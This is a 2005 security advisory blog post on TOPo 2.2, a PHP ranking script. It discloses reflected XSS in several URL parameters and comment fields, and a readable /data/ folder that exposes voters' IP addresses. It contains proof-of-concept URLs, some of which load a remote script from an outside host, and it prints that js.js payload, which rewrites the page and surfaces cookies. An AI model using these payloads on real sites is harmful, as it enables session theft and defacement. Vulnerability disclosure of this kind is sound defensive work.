TOPo 2.2 multiple variable & fields XSS and information disclosure

Friday, May 20, 2005
#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisore: http://lostmon.blogspot.com/2005/05/
topo-22-multiple-variable-fields-xss.html
vendor notified: yes exploit available: yes.
OSVDB ID:16699 and 16700
secunia:SA15325
Securitytracker:1014016
BID:13700 and 13701
#######################################################

TOPo is a free TOP system written in PHP that works
without MySQL database.TOPo is specially designed for
web sites hosted in web servers that not offer a
quality MySQL support.

TOPo contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'm','s','ID','t' and possible other parameters
upon submission to the 'index.php'script.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server,leading to a loss of integrity.

TOPo contains a flaw too that allow remote users to information
disclosure. All data are stored in '/data/' folder and all *.dat
files store all votes, comments and other information about the
site on top. Any user can download this files and obtain all
client ip address(all clients who are vote or added a comment)

################
software use:
###############

Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet explorer 6.0 sp1 all fixes.
Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D)
Google toolbar 2.0.114.9-big/es

###########
versions:
###########

TOPo v2.2.178 vulnerable.

##############
solution
##############

no solution was available at this time.

############
time line
############

discovered: 13 may 2005
vendor notify: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005

######################
Proof of concepts XSS
######################

http://[victim]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498

http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar

http://[victim]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>

http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>

http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script>

#########################

Wen try to added a new comment some fields are vulnerable
to XSS style attacks.

http://[victim]/top/index.php?m=top&s=info&t=comments
&paso=1&ID=1115946293.3552

field name vulnerable, Your web field vulnerable and
your email field are vulnerable.

##################
example of js.js
##################

Thnx to http://www.drorshalev.com for this script and for hosting it
for this demostration.

#################
js.js
#################

function showIt(){
document.body.innerHTML="<a href='javascript:alert(document.cookie)
'><center><b>Your PC Can be hacked Via "+ document.domain
+" XSS ,Html Injection to a Web Site"+document.domain +" By
DrorShalev.com<br></b><br><img border=0 src=
'http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60
><img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp'
border=1><br></center></a>"+
document.body.innerHTML window.status="Your PC Can be hacked Via
"+ document.domain +" XSS ,Html Injection to a Web Site "
+document.domain +" By DrorShalev.com" setTimeout
("window.open('view-source:http://sec.drorshalev.com/dev/
injection/xss.txt')",6000);
}
setTimeout("showIt()",2000);

################
data disclosure
################

http://[victim]/data/

################ EnD #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
Thnx to http://www.drorshalev.com and dror
for his script and for hosting it !!!!
thnx to all who day after day support me !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...